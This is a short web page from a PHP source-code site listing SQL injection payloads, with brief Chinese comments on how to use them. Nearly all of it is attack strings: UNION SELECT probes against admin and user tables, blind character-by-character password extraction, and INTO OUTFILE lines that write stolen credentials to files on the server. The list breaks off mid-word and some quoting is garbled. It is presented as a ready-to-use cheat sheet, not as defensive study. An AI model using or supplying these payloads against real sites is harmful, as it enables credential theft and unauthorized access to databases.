php注入方法集锦-PHP源码-php.cn

ホームページ

php教程

PHP源码

php注入方法集锦

Jun 08, 2016 pm 05:32 PM

from nbsp select union

''%23

'' and passWord=''mypass

id=-1 union select 1,1,1

id=-1 union select char(97),char(97),char(97)

id=1 union select 1,1,1 from members

id=1 union select 1,1,1 from admin

id=1 union select 1,1,1 from user

userid=1 and password=mypass

userid=1 and mid(password,3,1)=char(112)

userid=1 and mid(password,4,1)=char(97)

and ord(mid(password,3,1))>111 （ord函数很好用，可以返回整形的）

'' and LENGTH(password)=''6（探测密码长度）

'' and LEFT(password,1)=''m

'' and LEFT(password,2)=''my

…………………………依次类推

'' union select 1,username,password from user/*

'' union select 1,username,password from user/*

='' union select 1,username,password from user/* （可以是1或者=后直接跟）

99999'' union select 1,username,password from user/*

'' into outfile ''c:/file.txt （导出文件）

='' or 1=1 into outfile ''c:/file.txt

1'' union select 1,username,password from user into outfile ''c:/user.txt

select password FROM admins where login=''John'' INTO DUMPFILE ''/path/to/site/file.txt''

id='' union select 1,username,password from user into outfile

id=-1 union select 1,database(),version() （灵活应用查询）

常用查询测试语句，

select * FROM table where 1=1

select * FROM table where ''uuu''=''uuu''

select * FROM table where 12

select * FROM&nbs

このウェブサイトの声明

この記事の内容はネチズンが自主的に寄稿したものであり、著作権は原著者に帰属します。このサイトは、それに相当する法的責任を負いません。盗作または侵害の疑いのあるコンテンツを見つけた場合は、admin@php.cn までご連絡ください。